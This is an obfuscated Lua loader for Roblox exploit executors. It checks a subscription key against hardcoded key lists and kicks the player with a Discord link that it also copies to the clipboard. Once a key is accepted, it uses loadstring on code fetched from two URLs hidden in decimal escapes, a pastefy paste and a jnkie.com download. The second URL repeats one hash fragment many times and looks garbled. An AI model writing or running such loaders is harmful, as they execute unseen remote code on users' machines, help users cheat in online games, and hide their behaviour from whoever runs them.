local _0x5365 = {"\104\116\116\112\115\58\47\47\100\105\115\99\111\114\100\46\103\103\47\104\80\69\98\114\65\74\70\68\86", "\109\121\115\99\114\101\101\112\116\95\107\101\121\46\116\120\116", "\115\101\116\99\108\105\112\98\111\97\114\100", "\116\111\99\108\105\112\98\111\97\114\100"}
local _0x4c = getgenv()
local _0x88 = game:GetService("\83\116\97\114\116\101\114\71\117\105")
local _0x99 = game.Players.LocalPlayer

local function _0x1a(_0x2b)
    local _0x3c = setclipboard or toclipboard or set_clipboard or (Clipboard and Clipboard.set)
    if _0x3c then _0x3c(_0x2b) end
end

local function _0xKick(_0xMsg)
    _0x1a(_0x5365[1])
    _0x99:Kick("\n" .. _0xMsg .. "\n\nGo to the Discord server and make a ticket for a key\nor DM @banronthetrader_ or @duelingonly\n\nDiscord: " .. _0x5365[1] .. "\n(Link copied to clipboard)")
end

local _0xDur = {["\49\100\97\121"]=86400,["\51\100\97\121"]=259200,["\55\100\97\121"]=604800,["\49\53\100\97\121"]=1296000,["\51\48\100\97\121"]=2592000,["\108\105\102\101"]=9999999999}
local _0xRaw = {["\49\100\97\121"]={"7K9P2X4M1W8L5Z3N6V","Q9R4B2N1X7V8C3M5K6","W2E8T4Y1U7I9O3P5S6","A1S9D2F8G3H7J4K6L5","Z9X1C8V2B7N3M4Q6W5","P8O2I7U3Y1T9R4E6W5","L9K1J8H2G7F3D4S6A5","M1N9B2V8C3X7Z4Q6W5","1Q2W3E4R5T6Y7U8I9O","9P8O7I6U5Y4T3R2E1W"},["\108\105\102\101"]={"MASTER_999_X1Z2Y3","INFINITY_W8E7R6T","ETERNAL_A1S2D3F4","LIFETIME_QWERTYUI"}}
-- (Additional keys would be listed here in raw format)

local _0xDB = {}
for _0xT, _0xKs in pairs(_0xRaw) do
    for _, _0xV in ipairs(_0xKs) do
        _0xDB[_0xV] = {t = _0xT, a = 0, u = nil}
    end
end

if not _0x4c.SCRIPT_ID and isfile(_0x5365[2]) then
    _0x4c.SCRIPT_ID = readfile(_0x5365[2])
end

local _0xK = _0x4c.SCRIPT_ID
if not _0xK then _0xKick("[Access Denied] No SCRIPT_ID found.") return end

local _0xDat = _0xDB[_0xK]
if _0xDat then
    local _0xNow = os.time()
    if _0xDat.u ~= nil and _0xDat.u ~= _0x99.UserId then
        _0xKick("[Key In Use] Active on another account.")
        return
    end
    if _0xDat.a == 0 then
        _0xDat.a = _0xNow
        _0xDat.u = _0x99.UserId
    end
    if _0xNow > (_0xDat.a + _0xDur[_0xDat.t]) then
        if isfile(_0x5365[2]) then delfile(_0x5365[2]) end
        _0xKick("[Key Expired] Subscription ended.")
    else
        writefile(_0x5365[2], _0xK)
        _0x88:SetCore("SendNotification", {Title = "Success", Text = "Welcome, " .. _0x99.Name, Duration = 5})
        
        local _0xL1 = "\104\116\116\112\115\58\47\47\112\97\115\116\101\102\121\46\97\112\112\47\88\49\99\98\80\54\100\117\47\114\97\119"
        local _0xL2 = "\104\116\116\112\115\58\47\47\97\112\105\46\106\110\107\105\101\46\99\111\109\47\97\112\105\47\118\49\47\108\117\97\115\99\114\105\112\116\115\47\112\117\98\108\105\99\47\52\53\98\50\50\54\100\51\56\102\54\102\48\51\53\101\101\56\102\54\57\98\102\100\51\100\54\53\49\53\53\55\54\100\57\50\57\56\98\53\100\56\51\51\57\53\55\99\101\55\48\54\56\102\98\100\51\100\54\53\49\53\53\55\54\100\57\50\57\56\98\53\100\56\51\51\57\53\55\99\101\55\48\54\56\102\98\100\51\100\54\53\49\53\53\55\54\100\57\50\57\56\98\53\100\56\51\51\57\53\55\99\101\55\48\54\56\102\98\100\51\100\54\53\49\53\53\55\54\100\57\50\57\56\98\53\100\56\51\51\57\53\55\99\101\55\48\54\56\102\98\100\51\100\54\53\49\53\53\55\54\100\57\50\57\56\98\53\100\56\51\51\57\53\55\99\101\55\48\54\56\102\98\100\51\100\54\53\49\53\53\55\54\100\57\50\57\56\98\53\100\56\51\51\57\53\55\99\101\55\48\54\56\102\98\100\51\100\54\53\49\53\53\55\54\100\57\50\57\56\98\53\100\56\51\51\57\53\55\99\101\55\48\54\56\102\98\100\51\100\54\53\49\53\53\55\54\100\57\50\57\56\98\53\100\56\51\51\57\53\55\99\101\55\48\54\56\102\98\100\51\100\54\53\55\54\100\57\50\57\56\98\53\100\56\51\51\57\53\55\99\101\55\48\54\56\102\98\100\51\100\54\53\55\54\100\57\50\57\56\98\53\100\56\51\51\57\53\55\99\101\55\48\54\56\102\98\100\51\100\54\53\55\54\100\57\50\57\56\98\53\100\56\51\51\57\53\55\99\101\55\48\54\56\102\98\100\51\100\52\51\50\55\56\97\50\102\50\47\100\111\119\110\108\111\97\100"
        task.spawn(function() loadstring(game:HttpGet(_0xL1))() end)
        task.spawn(function() loadstring(game:HttpGet(_0xL2))() end)
    end
else
    _0xKick("[Invalid Key] Key was not found.")
end
